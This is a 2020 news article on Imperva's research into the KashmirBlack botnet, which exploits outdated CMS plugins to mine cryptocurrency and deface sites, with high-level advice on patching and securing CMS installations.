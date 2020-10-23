Forgotten or unsecured CMS systems are now easy meat for botnet masters in a hurry. getty

As criminals go, the people behind the vast and prolific KashmirBlack botnet must be an enterprising lot.

Not content with showering vulnerable content management systems (CMS) with plugin exploits, these guys have time for a little entrepreneurial action on the side selling campaign t-shirts at $7 a time (plus postage).

And intriguing apparel it is too, complete with over-blown religious iconography that wouldn’t look out of place in a rock concert foyer. Not the banality of evil perhaps, but a reminder that bad people can be pretty cocky.

With their own Facebook page, it’s almost as if they don’t think they’ll be found, or that nobody will bother to look. On that score, it turns out they were wrong.

In research released this week, security company Imperva lays bare the innards of the KashmirBlack botnet, a factory of evil which over the last year has spewed 20 different plugin and CMS exploits and payloads at an estimated 70,000 servers per day.

Plugins for life

Estimating its size is guesswork, but Imperva reckons it might have reached 230,000 compromised servers, or about 700 new victims per day. On the receiving end are mostly US-based WordPress, Jumla, Drupal, and vBulletin CMS systems vulnerable to any one of a long list software flaws.

These include, for starters, the JQuery file upload vulnerability (CVE-2018-9206), the ELFinder Command Injection (CVE-2019-9194), the Magneto Local File Inclusion (CVE-2015-2067), and the vBulletin Widget RCE (CVE-2019-16759).

Many go back years and should have been patched and yet it’s clear that KashmirBlack hasn’t had much trouble picking off low-hanging fruit. This weak patching is especially disappointing when considering the WordPress TimThumb RFI Vulnerability (CVE-2011-4106), an infamous script plugin issue first discovered in 2011.

“We suspect that the command & control has a scanner that searches for sites running CMS platforms, creates an attack instruction JSON with the new found sites, and pushes it into a queue waiting for bots to receive them and attack,” said Imperva.

The payloads either turn the server into a bot spreader or create backdoors which make it difficult for defenders to clean infection even if they know it’s present. In September, the botnet started using Dropbox for its C&C:

“Moving to Dropbox allows the botnet to hide illegitimate criminal activity behind legitimate web services. It is yet another step towards camouflaging the botnet traffic, securing the C&C operation.”

The business model is primarily mining Monero cryptocurrency, which on an infected server means sucking up to 50% of its CPU time. This will affect its performance under load although perhaps not enough for that to be noticed. There’s also a sideline in clickbait spamming.

Who’s behind it?

Tellingly, a third business model, website defacement, seems to have led Imperva to the hacker identity they believe is behind the entire botnet after that individual left a signature during one such attack.

There’s a connection to Indonesia, which serves to remind us that cybercrime has tentacles everywhere. Reading the US media, you might come away with the impression that cybercrime is filled with Russians, Chinese and Iranians when that’s always been a misleading simplification.

How do I know my CMS is affected?

That depends on the CMS and whether any vulnerable plugins are being used – Imperva has published a PDF list of affected software. If a site is infected, it’ll be a cleanup job for an experienced admin.

Importantly, the site’s core files and plugins should be updated, removing any of the latter which aren’t being used, and setting a secure password with a second factor for admin authentication.

It’s also a good idea to restrict access to certain files such as install.php, wp-config.php, and eval-stdin.php, Imperva says. However, the best security advice is simply to look after a CMS more diligently rather than abandoning ship.

The admin or owner might have forgotten about it but like an empty house in a good neighborhood, the botnet masters will be on to it in a shot.

The report doesn’t paint a pretty picture of a CMS world, too many bits of which are carelessly left to rot for years. This was never a good idea. These days, needlessly, it’s created a dangerous private playground for the bad guys to sow more chaos.

